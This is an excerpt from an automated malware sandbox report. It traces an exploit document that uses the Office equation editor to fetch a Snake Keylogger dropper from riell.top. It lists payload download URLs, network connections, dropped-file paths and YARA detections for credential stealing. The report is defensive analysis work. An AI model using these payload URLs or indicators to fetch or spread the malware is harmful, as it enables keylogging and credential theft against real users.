            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002340000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: obi23456.scr, 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002327000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: obi23456.scr, 0000000B.00000002.937566804.00000000023DA000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.000000000236A000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023D2000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002415000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937566804.0000000002423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
            Source: EQNEDT32.EXE, 00000009.00000003.412467105.0000000000952000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.drString found in binary or memory: https://riell.top/
            Source: obb.doc.url.0.drString found in binary or memory: https://riell.top/obb.doc
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.412653701.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.413385688.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scr
            Source: EQNEDT32.EXE, 00000009.00000002.413385688.0000000004180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrMC:
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrgn
            Source: EQNEDT32.EXE, 00000009.00000002.412653701.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrhhC:
            Source: EQNEDT32.EXE, 00000009.00000002.412653701.00000000008FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/obb.scrj
            Source: EQNEDT32.EXE, 00000009.00000003.412444845.000000000097E000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.412653701.000000000097E000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000B.00000002.937364961.0000000000364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
            Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
            Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
            Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.obi23456.scr.310000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.34b7a20.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 11.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.34971f0.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.obi23456.scr.3407b70.6.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.310000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.2409714.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.2406ed4.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.34b7a20.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.34971f0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 10.2.obi23456.scr.3407b70.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0000000A.00000002.414496758.0000000000310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obi23456.scr PID: 3500, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: obi23456.scr PID: 3532, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56784164.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Microsoft Office drops suspicious files
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.urlJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.urlJump to behavior
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obi23456.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJump to dropped file
            Source: C:\Users\user\AppData\Roaming\obi23456.scrProcess Stats: CPU usage > 49%
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 10_2_0018425F10_2_0018425F
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050306511_2_00503065
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050503811_2_00505038
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_005078C111_2_005078C1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050389111_2_00503891
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050291011_2_00502910
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050413011_2_00504130
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050D1D811_2_0050D1D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00503B7311_2_00503B73
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00505B1811_2_00505B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00502BF311_2_00502BF3
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050844D11_2_0050844D
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00508D7811_2_00508D78
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_005035B011_2_005035B0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00503E5011_2_00503E50
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050C75011_2_0050C750
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050674011_2_00506740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050700011_2_00507000
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050502811_2_00505028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_00506BA011_2_00506BA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050746011_2_00507460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050C74011_2_0050C740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050BFC811_2_0050BFC8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_0050BFBC11_2_0050BFBC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE17811_2_01EAE178
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAD4E011_2_01EAD4E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA6CC811_2_01EA6CC8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAF46011_2_01EAF460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE7C011_2_01EAE7C0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EADB3011_2_01EADB30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA5E5811_2_01EA5E58
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAEE1011_2_01EAEE10
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA25E011_2_01EA25E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAA5E111_2_01EAA5E1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAA5F011_2_01EAA5F0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA59F411_2_01EA59F4
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA25D111_2_01EA25D1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA55A811_2_01EA55A8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA55A511_2_01EA55A5
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA218811_2_01EA2188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAA18811_2_01EAA188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAA19811_2_01EAA198
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAA19011_2_01EAA190
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE16811_2_01EAE168
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE16C11_2_01EAE16C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA217811_2_01EA2178
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA9D4011_2_01EA9D40
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA514011_2_01EA5140
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA515011_2_01EA5150
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA1D2011_2_01EA1D20
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA1D3011_2_01EA1D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA9D3111_2_01EA9D31
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA98E811_2_01EA98E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA4CF811_2_01EA4CF8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA4CF011_2_01EA4CF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC8C811_2_01EAC8C8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA18C911_2_01EA18C9
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAD4CF11_2_01EAD4CF
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC8CC11_2_01EAC8CC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA18D811_2_01EA18D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC8D811_2_01EAC8D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA98D811_2_01EA98D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAD4D811_2_01EAD4D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC8D011_2_01EAC8D0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA48A011_2_01EA48A0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA6CBC11_2_01EA6CBC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA148011_2_01EA1480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC48011_2_01EAC480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA489011_2_01EA4890
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA946811_2_01EA9468
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC47C11_2_01EAC47C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC47011_2_01EAC470
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA147111_2_01EA1471
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA444811_2_01EA4448
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA945911_2_01EA9459
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA945C11_2_01EA945C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAF45C11_2_01EAF45C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAF45111_2_01EAF451
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAF45411_2_01EAF454
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA102811_2_01EA1028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC02811_2_01EAC028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA443C11_2_01EA443C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA101811_2_01EA1018
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC01911_2_01EAC019
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAC01C11_2_01EAC01C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA3FED11_2_01EA3FED
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA3FF011_2_01EA3FF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EABBC111_2_01EABBC1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA0BC411_2_01EA0BC4
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA0BD011_2_01EA0BD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EABBD011_2_01EABBD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE7BC11_2_01EAE7BC
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAE7B011_2_01EAE7B0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA3B8811_2_01EA3B88
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA3B9811_2_01EA3B98
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA076811_2_01EA0768
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB76711_2_01EAB767
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA077811_2_01EA0778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB77811_2_01EAB778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB77411_2_01EAB774
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA374011_2_01EA3740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA032011_2_01EA0320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB32011_2_01EAB320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EADB2111_2_01EADB21
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EADB2411_2_01EADB24
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA373811_2_01EA3738
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA870811_2_01EA8708
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB31811_2_01EAB318
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB31C11_2_01EAB31C
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA031011_2_01EA0310
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAB31111_2_01EAB311
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA32E811_2_01EA32E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA32D911_2_01EA32D9
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EAAEA011_2_01EAAEA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA768811_2_01EA7688
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA2E8111_2_01EA2E81
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA769811_2_01EA7698
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 11_2_01EA2E9011_2_01EA2E90
